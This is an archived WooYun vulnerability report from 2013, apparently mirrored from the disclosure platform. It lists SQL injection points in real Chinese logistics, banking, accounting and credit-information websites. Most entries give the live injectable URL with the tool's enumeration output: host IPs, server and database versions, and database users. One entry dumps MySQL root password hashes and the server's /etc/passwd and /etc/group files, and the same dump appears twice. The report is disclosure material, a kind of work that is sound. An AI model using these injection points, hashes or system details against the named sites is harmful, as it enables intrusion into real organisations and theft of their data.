乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-05-28: 细节已通知厂商并且等待厂商处理中 2013-06-01: 厂商已经确认,细节仅向厂商公开 2013-06-11: 细节向核心白帽子及相关领域专家公开 2013-06-21: 细节向普通白帽子公开 2013-07-01: 细节向实习白帽子公开 2013-07-12: 细节向公众公开
....
【上海市快递业协会】注入点 http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14Target: http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14Host IP: 222.73.218.56Web Server: Microsoft-IIS/6.0Powered-by: ASP.NETPowered-by: PHP/5.2.17DB Server: MySQL >=5Resp. Time(avg): 671 msCurrent User: kdxhdata@localhostSql Version: 5.1.63-communityCurrent DB: kdxhdataSystem User: kdxhdata@localhostHost Name: ewww6-c5d621bc4Installation dir: D:\Data\MySQL\MySQL Server 5.1DB User: 'kdxhdata'@'localhost'Data Bases: information_schema kdxhdata 后台可进 我就不截图了 测试账号居然不删的 囧死了
后台可进 我就不截图了 测试账号居然不删的 囧死了
【中山市物流协会】注入点 http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214Target: http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214Host IP: 119.145.255.140Web Server: nginx/1.2.0DB Server: MySQL >=4.1Resp. Time(avg): 97 msCurrent User: [email protected]Sql Version: 4.1.20-standard-logCurrent DB: logisticsSystem User: [email protected]DB User & Pass: root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:localhost root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:119.145.255.140 root:*1C66292FFB5D037ECC7825FFCF57B2C2F99D7F1A:127.0.0.1 [/etc/passwd]root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinavahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinrtkit:x:499:499:RealtimeKit:/proc:/sbin/nologinabrt:x:498:498::/etc/abrt:/sbin/nologinsaslauth:x:497:495:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinqemu:x:107:107:qemu user:/:/sbin/nologinavahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinpulse:x:496:494:PulseAudio System Daemon:/var/run/pulse:/sbin/nologingdm:x:42:42::/var/lib/gdm:/sbin/nologinforgov:x:500:500:forgov:/home/forgov:/sbin/nologindovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologindovenull:x:495:489:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinclamav:x:494:488:Clam Anti Virus Checker:/var/clamav:/sbin/nologinamavis:x:493:487::/var/spool/amavisd:/sbin/nologinvmail:x:501:501::/var/vmail:/sbin/nologinpolicyd:x:502:502::/home/policyd:/sbin/nologiniredadmin:x:503:503::/home/iredadmin:/sbin/nologiniredapd:x:504:504:iRedAPD daemon user:/home/iredapd:/sbin/nologinnagios:x:505:505::/home/nagios:/bin/bashzabbix:x:506:506::/home/zabbix:/bin/bash[/etc/group]root:x:0:rootbin:x:1:root,bin,daemondaemon:x:2:root,bin,daemonsys:x:3:root,bin,admadm:x:4:root,adm,daemontty:x:5:disk:x:6:rootlp:x:7:daemon,lpmem:x:8:kmem:x:9:wheel:x:10:rootmail:x:12:mail,postfixuucp:x:14:uucpman:x:15:games:x:20:gopher:x:30:video:x:39:dip:x:40:ftp:x:50:lock:x:54:audio:x:63:nobody:x:99:users:x:100:dbus:x:81:utmp:x:22:utempter:x:35:floppy:x:19:vcsa:x:69:avahi-autoipd:x:170:rpc:x:32:rtkit:x:499:abrt:x:498:desktop_admin_r:x:497:desktop_user_r:x:496:cdrom:x:11:tape:x:33:dialout:x:18:saslauth:x:495:postdrop:x:90:postfix:x:89:rpcuser:x:29:nfsnobody:x:65534:haldaemon:x:68:haldaemonkvm:x:36:qemuqemu:x:107:avahi:x:70:ntp:x:38:sshd:x:74:mysql:x:27:tcpdump:x:72:slocate:x:21:oprofile:x:16:pulse:x:494:pulse-access:x:493:stapdev:x:492:stapusr:x:491:fuse:x:490:stap-server:x:155:gdm:x:42:forgov:x:500:dovecot:x:97:dovenull:x:489:apache:x:48:clamav:x:488:amavis:x:487:clamavvmail:x:501:policyd:x:502:iredadmin:x:503:iredapd:x:504:nagios:x:505:zabbix:x:506:vbirdgroup:x:507:
[/etc/passwd]root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinavahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinrtkit:x:499:499:RealtimeKit:/proc:/sbin/nologinabrt:x:498:498::/etc/abrt:/sbin/nologinsaslauth:x:497:495:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinqemu:x:107:107:qemu user:/:/sbin/nologinavahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinpulse:x:496:494:PulseAudio System Daemon:/var/run/pulse:/sbin/nologingdm:x:42:42::/var/lib/gdm:/sbin/nologinforgov:x:500:500:forgov:/home/forgov:/sbin/nologindovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologindovenull:x:495:489:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinclamav:x:494:488:Clam Anti Virus Checker:/var/clamav:/sbin/nologinamavis:x:493:487::/var/spool/amavisd:/sbin/nologinvmail:x:501:501::/var/vmail:/sbin/nologinpolicyd:x:502:502::/home/policyd:/sbin/nologiniredadmin:x:503:503::/home/iredadmin:/sbin/nologiniredapd:x:504:504:iRedAPD daemon user:/home/iredapd:/sbin/nologinnagios:x:505:505::/home/nagios:/bin/bashzabbix:x:506:506::/home/zabbix:/bin/bash[/etc/group]root:x:0:rootbin:x:1:root,bin,daemondaemon:x:2:root,bin,daemonsys:x:3:root,bin,admadm:x:4:root,adm,daemontty:x:5:disk:x:6:rootlp:x:7:daemon,lpmem:x:8:kmem:x:9:wheel:x:10:rootmail:x:12:mail,postfixuucp:x:14:uucpman:x:15:games:x:20:gopher:x:30:video:x:39:dip:x:40:ftp:x:50:lock:x:54:audio:x:63:nobody:x:99:users:x:100:dbus:x:81:utmp:x:22:utempter:x:35:floppy:x:19:vcsa:x:69:avahi-autoipd:x:170:rpc:x:32:rtkit:x:499:abrt:x:498:desktop_admin_r:x:497:desktop_user_r:x:496:cdrom:x:11:tape:x:33:dialout:x:18:saslauth:x:495:postdrop:x:90:postfix:x:89:rpcuser:x:29:nfsnobody:x:65534:haldaemon:x:68:haldaemonkvm:x:36:qemuqemu:x:107:avahi:x:70:ntp:x:38:sshd:x:74:mysql:x:27:tcpdump:x:72:slocate:x:21:oprofile:x:16:pulse:x:494:pulse-access:x:493:stapdev:x:492:stapusr:x:491:fuse:x:490:stap-server:x:155:gdm:x:42:forgov:x:500:dovecot:x:97:dovenull:x:489:apache:x:48:clamav:x:488:amavis:x:487:clamavvmail:x:501:policyd:x:502:iredadmin:x:503:iredapd:x:504:nagios:x:505:zabbix:x:506:vbirdgroup:x:507:
【广东省企业信用信息网】注入点:http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:Target: http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:Host IP: 210.76.66.106Web Server: Apache/2.0.49 (Unix)DB Server: OracleResp. Time(avg): 2590 msCurrent User: CREDITIs User DBA: FALSESql Version: Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - ProdCurrent DB: CRDTHost Name: localhostDB User: SCOTT MGMT_VIEW WKPROXY WKSYS MDDATA SYSMAN ANONYMOUS XDB WK_TEST OLAPSYS CTXSYS MDSYS SI_INFORMTN_SCHEMA ORDPLUGINS ORDSYS EXFSYS WMSYS DBSNMP DMSYS DIP OUTLN SYSTEM SYS CREDITData Bases: SYS SYS SYS SYS 虽然不知道是什么用的数据表 但是我觉得挺厉害的
虽然不知道是什么用的数据表 但是我觉得挺厉害的
湖北省物流公共信息服务平台登陆框注入 http://www.56ok.net/backstage/Login.aspx 后台
http://www.56ok.net/backstage/Login.aspx 后台
【东莞市物流行业协会官方网】注入点 http://www.0769wl.com/info/info_browse.php?infoID=6548Target: http://www.0769wl.com/info/info_browse.php?infoID=6548Host IP: 222.186.191.104Web Server: Microsoft-IIS/6.0Powered-by: ASP.NETPowered-by: PHP/5.2.6DB Server: MySQL >=5Resp. Time(avg): 210 msCurrent User: sql0769wl@suer-ab6d8c667eSql Version: 5.0.51b-community-ntCurrent DB: sql0769wlSystem User: sql0769wl@suer-ab6d8c667eHost Name: suer-ab6d8c667eInstallation dir: E:\PHPnow\MySQL-5.0.15bDB User: 'sql0769wl'@'%'Data Bases: information_schema sql0769wl 不知道哪个是 后台表 搁在这儿
不知道哪个是 后台表 搁在这儿
【南通市银行业协会】注入点 http://www.bankingassociationnt.com/news/Transfer.asp?newsid=8084 用户名可读出 具体的应急中心测试吧
用户名可读出 具体的应急中心测试吧
【海南省注册会计协会】注入点:http://www.hicpa.org.cn/acctt_web/papers/zhxx.asp?cs=101
危害等级:高
漏洞Rank:20
确认时间:2013-06-01 22:13
暂无